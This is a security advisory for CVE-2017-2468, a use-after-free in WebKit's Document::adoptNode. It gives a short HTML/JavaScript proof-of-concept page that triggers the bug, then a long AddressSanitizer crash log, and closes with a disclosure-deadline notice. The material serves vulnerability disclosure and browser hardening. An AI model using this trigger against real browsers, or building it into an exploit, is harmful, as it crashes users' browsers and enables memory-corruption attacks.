WebKit Document::adoptNode Use-After-Free

WebKit suffers from a use-after-free vulnerability in Document::adoptNode.


MD5 | 91b2a30a07f70784e067586adc2e2fdf

 WebKit: Use-After-Free via Document::adoptNode 

CVE-2017-2468


This is a regression test from: <a href="https://crbug.com/541206" title="" class="" rel="nofollow">https://crbug.com/541206</a>.
But I think it seems not possible to turn it into an UXSS in WebKit.

PoC:
<body>
<script>

var s = document.body.appendChild(document.createElement('script'));
s.type = '0';
s.textContent = 'document.body.appendChild(parent.i0)';

var i0 = s.appendChild(document.createElement('iframe'));
s.type = '';

var f = document.body.appendChild(document.createElement('iframe'));
f.contentDocument.adoptNode(i0);
f.src = 'about:blank';

</script>
</body>

Asan Log:
==54938==ERROR: AddressSanitizer: heap-use-after-free on address 0x61a0000c5a80 at pc 0x0001151d388b bp 0x7fff584254c0 sp 0x7fff584254b8
READ of size 8 at 0x61a0000c5a80 thread T0
#0 0x1151d388a in WTF::TypeCastTraits<WebCore::FrameView const, WebCore::ScrollView const, false>::isType(WebCore::Widget const&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7788a)
#1 0x115c355e8 in WebCore::FrameView::convertToContainingView(WebCore::IntPoint const&) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xad95e8)
#2 0x1176e8df7 in WebCore::ScrollView::contentsToContainingViewContents(WebCore::IntPoint const&) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x258cdf7)
#3 0x1176af5d4 in WebCore::ScrollingCoordinator::absoluteEventTrackingRegionsForFrame(WebCore::Frame const&) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x25535d4)
#4 0x1176afb10 in WebCore::ScrollingCoordinator::absoluteEventTrackingRegions() const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2553b10)
#5 0x115298ff9 in WebCore::AsyncScrollingCoordinator::frameViewLayoutUpdated(WebCore::FrameView&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x13cff9)
#6 0x115c140f9 in WebCore::FrameView::performPostLayoutTasks() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xab80f9)
#7 0x115c1c24a in WebCore::FrameView::layout(bool) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xac024a)
#8 0x11586e89e in WebCore::Document::implicitClose() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x71289e)
#9 0x115bdf621 in WebCore::FrameLoader::checkCompleted() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa83621)
#10 0x115bdcafa in WebCore::FrameLoader::finishedParsing() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa80afa)
#11 0x11588c12d in WebCore::Document::finishedParsing() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x73012d)
#12 0x115d8f14d in WebCore::HTMLDocumentParser::prepareToStopParsing() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc3314d)
#13 0x11592316c in WebCore::DocumentWriter::end() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7c716c)
#14 0x1158e622f in WebCore::DocumentLoader::finishedLoading(double) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x78a22f)
#15 0x1158ee2e5 in WebCore::DocumentLoader::maybeLoadEmpty() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7922e5)
#16 0x1158ee6d3 in WebCore::DocumentLoader::startLoadingMainResource() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7926d3)
#17 0x115beec01 in WebCore::FrameLoader::continueLoadAfterWillSubmitForm() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa92c01)
#18 0x115be8495 in WebCore::FrameLoader::continueLoadAfterNavigationPolicy(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8c495)
#19 0x115bfc4ba in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4::operator()(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa04ba)
#20 0x115bfc301 in void std::__1::__invoke_void_return_wrapper<void>::__call<WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool>(WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4&&&, WebCore::ResourceRequest const&&&, WTF::PassRefPtr<WebCore::FormState>&&, bool&&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa0301)
#21 0x1170fd592 in std::__1::function<void (WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool)>::operator()(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa1592)
#22 0x1170fd300 in WebCore::PolicyCallback::call(bool) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa1300)
#23 0x1170ff0aa in WebCore::PolicyChecker::continueAfterNavigationPolicy(WebCore::PolicyAction) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa30aa)
#24 0x107df7b2e in std::__1::function<void (WebCore::PolicyAction)>::operator()(WebCore::PolicyAction) const (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60fb2e)
#25 0x107df7986 in WebKit::WebFrame::didReceivePolicyDecision(unsigned long long, WebCore::PolicyAction, unsigned long long, WebKit::DownloadID) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60f986)
#26 0x107e07dbc in WebKit::WebFrameLoaderClient::dispatchDecidePolicyForNavigationAction(WebCore::NavigationAction const&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, std::__1::function<void (WebCore::PolicyAction)>) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x61fdbc)
#27 0x1170fea08 in WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest const&, bool, WebCore::DocumentLoader*, WTF::PassRefPtr<WebCore::FormState>, std::__1::function<void (WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool)>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa2a08)
#28 0x115be72b3 in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8b2b3)
#29 0x115be5de6 in WebCore::FrameLoader::loadWithNavigationAction(WebCore::ResourceRequest const&, WebCore::NavigationAction const&, WebCore::LockHistory, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa89de6)
#30 0x115be2113 in WebCore::FrameLoader::loadURL(WebCore::FrameLoadRequest const&, WTF::String const&, WebCore::FrameLoadType, WebCore::Event*, WTF::PassRefPtr<WebCore::FormState>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa86113)
#31 0x115bdb1c4 in WebCore::FrameLoader::loadFrameRequest(WebCore::FrameLoadRequest const&, WebCore::Event*, WTF::PassRefPtr<WebCore::FormState>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa7f1c4)
#32 0x115bda68e in WebCore::FrameLoader::urlSelected(WebCore::FrameLoadRequest const&, WebCore::Event*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa7e68e)
#33 0x116fdaa98 in WebCore::ScheduledLocationChange::fire(WebCore::Frame&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1e7ea98)
#34 0x116fd732f in WebCore::NavigationScheduler::timerFired() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1e7b32f)
#35 0x117b92cd1 in WebCore::ThreadTimers::sharedTimerFiredInternal() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2a36cd1)
#36 0x116df2baf in WebCore::timerFired(__CFRunLoopTimer*, void*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1c96baf)
#37 0x7fff93728243 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x91243)
#38 0x7fff93727ece in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x90ece)
#39 0x7fff93727a29 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x90a29)
#40 0x7fff9371f3e0 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x883e0)
#41 0x7fff9371e973 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x87973)
#42 0x7fff92caaacb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30acb)
#43 0x7fff92caa900 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30900)
#44 0x7fff92caa735 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30735)
#45 0x7fff91250ae3 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x46ae3)
#46 0x7fff919cb21e in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x7c121e)
#47 0x7fff91245464 in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x3b464)
#48 0x7fff9120fd7f in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x5d7f)
#49 0x7fffa8edb8c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib+0x108c6)
#50 0x7fffa8eda2e3 in xpc_main (/usr/lib/system/libxpc.dylib+0xf2e3)
#51 0x1077d1b73 in main (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development+0x100001b73)
#52 0x7fffa8c77254 in start (/usr/lib/system/libdyld.dylib+0x5254)

0x61a0000c5a80 is located 0 bytes inside of 1232-byte region [0x61a0000c5a80,0x61a0000c5f50)
freed by thread T0 here:
#0 0x10a087db9 in wrap_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4adb9)
#1 0x10d0da25b in bmalloc::Deallocator::deallocateSlowCase(void*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18c725b)
#2 0x11759427e in WTF::RefPtr<WebCore::Widget>::operator=(std::nullptr_t) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x243827e)
#3 0x117592d19 in WebCore::RenderWidget::setWidget(WTF::RefPtr<WebCore::Widget>&&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2436d19)
#4 0x115bd46be in WebCore::Frame::createView(WebCore::IntSize const&, WebCore::Color const&, bool, WebCore::IntSize const&, WebCore::IntRect const&, bool, WebCore::ScrollbarMode, bool, WebCore::ScrollbarMode, bool) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa786be)
#5 0x107e0df0b in WebKit::WebFrameLoaderClient::transitionToCommittedForNewPage() (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x625f0b)
#6 0x115beb6cf in WebCore::FrameLoader::transitionToCommitted(WebCore::CachedPage*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8f6cf)
#7 0x115bea77b in WebCore::FrameLoader::commitProvisionalLoad() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8e77b)
#8 0x1158e6197 in WebCore::DocumentLoader::finishedLoading(double) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x78a197)
#9 0x1158ee2e5 in WebCore::DocumentLoader::maybeLoadEmpty() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7922e5)
#10 0x1158ee6d3 in WebCore::DocumentLoader::startLoadingMainResource() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7926d3)
#11 0x115beec01 in WebCore::FrameLoader::continueLoadAfterWillSubmitForm() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa92c01)
#12 0x115be8495 in WebCore::FrameLoader::continueLoadAfterNavigationPolicy(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8c495)
#13 0x115bfc4ba in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4::operator()(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa04ba)
#14 0x115bfc301 in void std::__1::__invoke_void_return_wrapper<void>::__call<WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool>(WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4&&&, WebCore::ResourceRequest const&&&, WTF::PassRefPtr<WebCore::FormState>&&, bool&&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa0301)
#15 0x1170fd592 in std::__1::function<void (WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool)>::operator()(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa1592)
#16 0x1170fd300 in WebCore::PolicyCallback::call(bool) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa1300)
#17 0x1170ff0aa in WebCore::PolicyChecker::continueAfterNavigationPolicy(WebCore::PolicyAction) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa30aa)
#18 0x107df7b2e in std::__1::function<void (WebCore::PolicyAction)>::operator()(WebCore::PolicyAction) const (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60fb2e)
#19 0x107df7986 in WebKit::WebFrame::didReceivePolicyDecision(unsigned long long, WebCore::PolicyAction, unsigned long long, WebKit::DownloadID) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60f986)
#20 0x107e07dbc in WebKit::WebFrameLoaderClient::dispatchDecidePolicyForNavigationAction(WebCore::NavigationAction const&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, std::__1::function<void (WebCore::PolicyAction)>) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x61fdbc)
#21 0x1170fea08 in WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest const&, bool, WebCore::DocumentLoader*, WTF::PassRefPtr<WebCore::FormState>, std::__1::function<void (WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool)>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa2a08)
#22 0x115be72b3 in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8b2b3)
#23 0x115be5de6 in WebCore::FrameLoader::loadWithNavigationAction(WebCore::ResourceRequest const&, WebCore::NavigationAction const&, WebCore::LockHistory, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa89de6)
#24 0x115be2113 in WebCore::FrameLoader::loadURL(WebCore::FrameLoadRequest const&, WTF::String const&, WebCore::FrameLoadType, WebCore::Event*, WTF::PassRefPtr<WebCore::FormState>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa86113)
#25 0x115bdb1c4 in WebCore::FrameLoader::loadFrameRequest(WebCore::FrameLoadRequest const&, WebCore::Event*, WTF::PassRefPtr<WebCore::FormState>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa7f1c4)
#26 0x115bda68e in WebCore::FrameLoader::urlSelected(WebCore::FrameLoadRequest const&, WebCore::Event*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa7e68e)
#27 0x116fdaa98 in WebCore::ScheduledLocationChange::fire(WebCore::Frame&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1e7ea98)
#28 0x116fd732f in WebCore::NavigationScheduler::timerFired() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1e7b32f)
#29 0x117b92cd1 in WebCore::ThreadTimers::sharedTimerFiredInternal() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2a36cd1)

previously allocated by thread T0 here:
#0 0x10a087bf0 in wrap_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4abf0)
#1 0x10d0d901e in bmalloc::Allocator::allocateSlowCase(unsigned long) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18c601e)
#2 0x10d074535 in bmalloc::Allocator::allocate(unsigned long) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1861535)
#3 0x115c14a59 in WebCore::FrameView::create(WebCore::Frame&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xab8a59)
#4 0x115bd459c in WebCore::Frame::createView(WebCore::IntSize const&, WebCore::Color const&, bool, WebCore::IntSize const&, WebCore::IntRect const&, bool, WebCore::ScrollbarMode, bool, WebCore::ScrollbarMode, bool) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa7859c)
#5 0x107e0df0b in WebKit::WebFrameLoaderClient::transitionToCommittedForNewPage() (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x625f0b)
#6 0x115beb6cf in WebCore::FrameLoader::transitionToCommitted(WebCore::CachedPage*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8f6cf)
#7 0x115bea77b in WebCore::FrameLoader::commitProvisionalLoad() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8e77b)
#8 0x1158e6197 in WebCore::DocumentLoader::finishedLoading(double) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x78a197)
#9 0x1158ee2e5 in WebCore::DocumentLoader::maybeLoadEmpty() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7922e5)
#10 0x1158ee6d3 in WebCore::DocumentLoader::startLoadingMainResource() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7926d3)
#11 0x115beec01 in WebCore::FrameLoader::continueLoadAfterWillSubmitForm() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa92c01)
#12 0x115be8495 in WebCore::FrameLoader::continueLoadAfterNavigationPolicy(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8c495)
#13 0x115bfc4ba in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4::operator()(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa04ba)
#14 0x115bfc301 in void std::__1::__invoke_void_return_wrapper<void>::__call<WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool>(WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4&&&, WebCore::ResourceRequest const&&&, WTF::PassRefPtr<WebCore::FormState>&&, bool&&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa0301)
#15 0x1170fd592 in std::__1::function<void (WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool)>::operator()(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa1592)
#16 0x1170fd300 in WebCore::PolicyCallback::call(bool) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa1300)
#17 0x1170ff0aa in WebCore::PolicyChecker::continueAfterNavigationPolicy(WebCore::PolicyAction) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa30aa)
#18 0x107df7b2e in std::__1::function<void (WebCore::PolicyAction)>::operator()(WebCore::PolicyAction) const (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60fb2e)
#19 0x107df7986 in WebKit::WebFrame::didReceivePolicyDecision(unsigned long long, WebCore::PolicyAction, unsigned long long, WebKit::DownloadID) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60f986)
#20 0x107e07dbc in WebKit::WebFrameLoaderClient::dispatchDecidePolicyForNavigationAction(WebCore::NavigationAction const&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, std::__1::function<void (WebCore::PolicyAction)>) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x61fdbc)
#21 0x1170fea08 in WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest const&, bool, WebCore::DocumentLoader*, WTF::PassRefPtr<WebCore::FormState>, std::__1::function<void (WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool)>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa2a08)
#22 0x115be72b3 in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8b2b3)
#23 0x115be5de6 in WebCore::FrameLoader::loadWithNavigationAction(WebCore::ResourceRequest const&, WebCore::NavigationAction const&, WebCore::LockHistory, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa89de6)
#24 0x115be2113 in WebCore::FrameLoader::loadURL(WebCore::FrameLoadRequest const&, WTF::String const&, WebCore::FrameLoadType, WebCore::Event*, WTF::PassRefPtr<WebCore::FormState>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa86113)
#25 0x115be043c in WebCore::FrameLoader::loadURLIntoChildFrame(WebCore::URL const&, WTF::String const&, WebCore::Frame*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8443c)
#26 0x107e0ed25 in WebKit::WebFrameLoaderClient::createFrame(WebCore::URL const&, WTF::String const&, WebCore::HTMLFrameOwnerElement*, WTF::String const&, bool, int, int) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x626d25)
#27 0x117966328 in WebCore::SubframeLoader::loadSubframe(WebCore::HTMLFrameOwnerElement&, WebCore::URL const&, WTF::String const&, WTF::String const&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x280a328)
#28 0x117964335 in WebCore::SubframeLoader::loadOrRedirectSubframe(WebCore::HTMLFrameOwnerElement&, WebCore::URL const&, WTF::AtomicString const&, WebCore::LockHistory, WebCore::LockBackForwardList) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2808335)
#29 0x117963f47 in WebCore::SubframeLoader::requestFrame(WebCore::HTMLFrameOwnerElement&, WTF::String const&, WTF::AtomicString const&, WebCore::LockHistory, WebCore::LockBackForwardList) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2807f47)

SUMMARY: AddressSanitizer: heap-use-after-free (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7788a) in WTF::TypeCastTraits<WebCore::FrameView const, WebCore::ScrollView const, false>::isType(WebCore::Widget const&)
Shadow bytes around the buggy address:
0x1c3400018b00: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c3400018b10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c3400018b20: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa
0x1c3400018b30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x1c3400018b40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x1c3400018b50:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c3400018b60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c3400018b70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c3400018b80: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c3400018b90: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c3400018ba0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==54938==ABORTING


This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.




Found by: lokihardt


Related Posts